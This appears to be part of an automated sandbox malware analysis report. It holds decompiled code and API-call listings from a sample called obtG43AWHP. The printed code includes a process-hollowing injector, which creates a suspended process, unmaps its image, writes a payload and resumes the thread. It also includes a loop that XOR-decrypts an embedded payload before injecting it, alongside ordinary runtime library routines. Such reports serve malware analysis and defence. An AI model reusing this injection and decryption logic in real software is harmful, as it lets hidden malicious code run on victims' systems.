    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004076D4(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				long _v8;
    				long _v12;
    				long _v16;
    				long _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				CHAR* _t25;
    				int _t26;
    				intOrPtr _t31;
    				intOrPtr _t34;
    				intOrPtr* _t37;
    				intOrPtr* _t38;
    				intOrPtr _t46;
    				intOrPtr _t48;
    
    				_t25 = _a4;
    				if(_t25 == 0) {
    					_t25 = 0;
    				}
    				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
    				_v28 = _v8 * _v12;
    				_v24 = 0;
    				_t46 = _v24;
    				_t31 = E00404B0C(_v28, _t46, _v16, 0);
    				_t37 = _a8;
    				 *_t37 = _t31;
    				 *((intOrPtr*)(_t37 + 4)) = _t46;
    				_t48 = _v24;
    				_t34 = E00404B0C(_v28, _t48, _v20, 0);
    				_t38 = _a12;
    				 *_t38 = _t34;
    				 *((intOrPtr*)(_t38 + 4)) = _t48;
    				return _t26;
    			}

    APIs
    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 004076F5
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BA10(void* __ecx) {
    				void* _t10;
    				char _t11;
    				void* _t14;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				char* _t22;
    
    				_t14 = E0040B9A0();
    				if(_t14 == 0) {
    					_t21 =  *0x419314; // 0xffffffff
    					L12:
    					return _t21;
    				}
    				_t18 = _t14;
    				_t20 = E0040B960(_t14);
    				_t10 = E0040B970(_t18);
    				_t21 = _t20;
    				if(_t20 !=  *0x419308 || _t10 !=  *0x419318) {
    					if(_t20 !=  *0x0041930C) {
    						L5:
    						if(_t20 !=  *0x00419310) {
    							L7:
    							_t11 = 0;
    							goto L9;
    						}
    						if(_t10 ==  *0x00419320) {
    							goto L8;
    						}
    						goto L7;
    					}
    					if(_t10 ==  *0x0041931C) {
    						goto L8;
    					}
    					goto L5;
    				} else {
    					L8:
    					_t11 = 1;
    					L9:
    					 *_t22 = _t11;
    					FreeResource(_t14);
    					if( *_t22 == 0) {
    						E0040B988();
    					}
    					goto L12;
    				}
    			}

    APIs
      • Part of subcall function 0040B9A0: FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
      • Part of subcall function 0040B9A0: LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
      • Part of subcall function 0040B9A0: FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
      • Part of subcall function 0040B9A0: LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    • FreeResource.KERNEL32(00000000,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553,00416F00,00000001,00417843,?,?), ref: 0040BA64
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AD2C() {
    				char _v128;
    				intOrPtr _v132;
    				signed int _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				int _t7;
    				struct _OSVERSIONINFOA* _t18;
    
    				_t18->dwOSVersionInfoSize = 0x94;
    				_t7 = GetVersionExA(_t18);
    				if(_t7 != 0) {
    					 *0x4190c0 = _v132;
    					 *0x4190c4 = _v144;
    					 *0x4190c8 = _v140;
    					if( *0x4190c0 != 1) {
    						 *0x4190cc = _v136;
    					} else {
    						 *0x4190cc = _v136 & 0x0000ffff;
    					}
    					return E004040F8(0x4190d0, 0x80,  &_v128);
    				}
    				return _t7;
    			}

    APIs
    • GetVersionExA.KERNEL32(?,0040C480,00000000,0040C498), ref: 0040AD3A
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03003F30() {
    
    				SetUnhandledExceptionFilter(E03003EEE);
    				return 0;
    			}

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00003EEE), ref: 03003F35
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    APIs
      • Part of subcall function 03004B90: EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    • LoadLibraryW.KERNEL32(USER32.DLL), ref: 030073E7
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 03007403
    • EncodePointer.KERNEL32(00000000), ref: 03007414
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 03007421
    • EncodePointer.KERNEL32(00000000), ref: 03007424
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 03007431
    • EncodePointer.KERNEL32(00000000), ref: 03007434
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 03007441
    • EncodePointer.KERNEL32(00000000), ref: 03007444
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 03007455
    • EncodePointer.KERNEL32(00000000), ref: 03007458
    • DecodePointer.KERNEL32(00000000,0300BE08,00000314,00000000), ref: 0300747A
    • DecodePointer.KERNEL32 ref: 03007484
    • DecodePointer.KERNEL32(?,0300BE08,00000314,00000000), ref: 030074C3
    • DecodePointer.KERNEL32(?), ref: 030074DD
    • DecodePointer.KERNEL32(0300BE08,00000314,00000000), ref: 030074F1
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 62%
    			E03004E89(void* __ebx) {
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t7;
    				long _t10;
    				void* _t11;
    				int _t12;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				void* _t18;
    				intOrPtr _t21;
    				long _t26;
    				void* _t30;
    				struct HINSTANCE__* _t35;
    				intOrPtr* _t36;
    				void* _t39;
    				intOrPtr* _t41;
    				void* _t42;
    
    				_t30 = __ebx;
    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
    				if(_t35 != 0) {
    					 *0x300c63c = GetProcAddress(_t35, "FlsAlloc");
    					 *0x300c640 = GetProcAddress(_t35, "FlsGetValue");
    					 *0x300c644 = GetProcAddress(_t35, "FlsSetValue");
    					_t7 = GetProcAddress(_t35, "FlsFree");
    					__eflags =  *0x300c63c;
    					_t39 = TlsSetValue;
    					 *0x300c648 = _t7;
    					if( *0x300c63c == 0) {
    						L6:
    						 *0x300c640 = TlsGetValue;
    						 *0x300c63c = E03004B99;
    						 *0x300c644 = _t39;
    						 *0x300c648 = TlsFree;
    					} else {
    						__eflags =  *0x300c640;
    						if( *0x300c640 == 0) {
    							goto L6;
    						} else {
    							__eflags =  *0x300c644;
    							if( *0x300c644 == 0) {
    								goto L6;
    							} else {
    								__eflags = _t7;
    								if(_t7 == 0) {
    									goto L6;
    								}
    							}
    						}
    					}
    					_t10 = TlsAlloc();
    					 *0x300b1c4 = _t10;
    					__eflags = _t10 - 0xffffffff;
    					if(_t10 == 0xffffffff) {
    						L15:
    						_t11 = 0;
    						__eflags = 0;
    					} else {
    						_t12 = TlsSetValue(_t10,  *0x300c640);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L15;
    						} else {
    							E03003F93();
    							_t41 = __imp__EncodePointer;
    							_t14 =  *_t41( *0x300c63c);
    							 *0x300c63c = _t14;
    							_t15 =  *_t41( *0x300c640);
    							 *0x300c640 = _t15;
    							_t16 =  *_t41( *0x300c644);
    							 *0x300c644 = _t16;
    							 *0x300c648 =  *_t41( *0x300c648);
    							_t18 = E03006D14();
    							__eflags = _t18;
    							if(_t18 == 0) {
    								L14:
    								E03004BD6();
    								goto L15;
    							} else {
    								_t36 = __imp__DecodePointer;
    								_t21 =  *((intOrPtr*)( *_t36()))( *0x300c63c, E03004D5A);
    								 *0x300b1c0 = _t21;
    								__eflags = _t21 - 0xffffffff;
    								if(_t21 == 0xffffffff) {
    									goto L14;
    								} else {
    									_t42 = E03006933(1, 0x214);
    									__eflags = _t42;
    									if(_t42 == 0) {
    										goto L14;
    									} else {
    										__eflags =  *((intOrPtr*)( *_t36()))( *0x300c644,  *0x300b1c0, _t42);
    										if(__eflags == 0) {
    											goto L14;
    										} else {
    											_push(0);
    											_push(_t42);
    											E03004C13(_t30, _t36, _t42, __eflags);
    											_t26 = GetCurrentThreadId();
    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
    											 *_t42 = _t26;
    											_t11 = 1;
    										}
    									}
    								}
    							}
    						}
    					}
    					return _t11;
    				} else {
    					E03004BD6();
    					return 0;
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
